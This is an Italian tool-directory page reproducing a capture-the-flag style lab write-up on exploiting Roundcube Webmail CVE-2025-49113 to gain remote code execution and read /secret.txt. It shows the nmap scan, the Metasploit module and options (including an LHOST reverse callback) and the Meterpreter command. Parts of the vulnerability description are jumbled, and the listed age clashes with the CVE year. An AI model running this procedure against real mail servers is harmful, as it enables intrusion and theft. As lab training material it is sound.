Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
roundcube-cve-2025-49113-lab — Laboratorio pratico di sfruttamento per Roundcube Webmail CVE-2025-49113 (deserializzazione di oggetti PHP autenticata → RCE) per leggere /secret.txt. | Kitploit
Strumenti/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneRed TeamingSviluppo Payload
Lab e Pratica
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Laboratorio pratico di sfruttamento per Roundcube Webmail CVE-2025-49113 (deserializzazione di oggetti PHP autenticata → RCE) per leggere /secret.txt.

Vedi Repository
39 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

"DICHIARAZIONE DI NON RESPONSABILITÀ: Solo a scopo educativo"

Roundcube Webmail RCE – CVE-2025-49113 Lab

Questo repository documenta la mia sfruttamento passo passo di Roundcube Webmail CVE-2025-49113 in un laboratorio controllato per ottenere il segreto memorizzato in /secret.txt.

⚠️ Dichiarazione di non responsabilità
Tutto il lavoro è stato eseguito su un ambiente di laboratorio / addestramento che sono autorizzato a testare.
Non utilizzare queste tecniche su sistemi che non possiedi o amministri.


Sfida

Roundcube Webmail è un client di posta elettronica PHP open-source basato su browser che si connette alle caselle di posta tramite IMAP e invia mail tramite SMTP. Comunemente funziona su Apache o Nginx con MySQL/PostgreSQL/SQLite ed è ampiamente utilizzato in ambienti di hosting condiviso.

Vulnerabilità – CVE-2025-49113

Tutte le versioni di Roundcube fino a 1.6.10 incluse (e 1.5.x prima di 1.5.10) contengono un bug critico in program/actions/settings/upload.php. Il parametro non è adeguatamente validato, il che consente a un attaccante autenticato di innescare e ottenere con privilegi del server web.

_from
deserializzazione non sicura di oggetti PHP
esecuzione di codice remoto

Credenziali del laboratorio:

  • Nome utente: roundcube
  • Password: rcpass

Obiettivo:

Qual è il segreto all'interno del file /secret.txt?


Ambiente di laboratorio

  • Host attaccante: Kali / HackerBox con:
    • nmap
    • msfconsole (Metasploit 6)
  • Host bersaglio: Roundcube Webmail su 172.20.2.57
  • Exploit utilizzato: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

Procedura

Passo 1 – Scoperta dei servizi con Nmap

Comando: nmap -sV Target Machine

Passo 2 – Individuare un exploit di deserializzazione di oggetti PHP in Metasploit

search php object deserialization

Passo 3 – Configurare il modulo exploit di Roundcube

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

Passo 4 – Ottenere una sessione Meterpreter e leggere /secret.txt

meterpreter > cat /secret.txt

Scarica lo strumento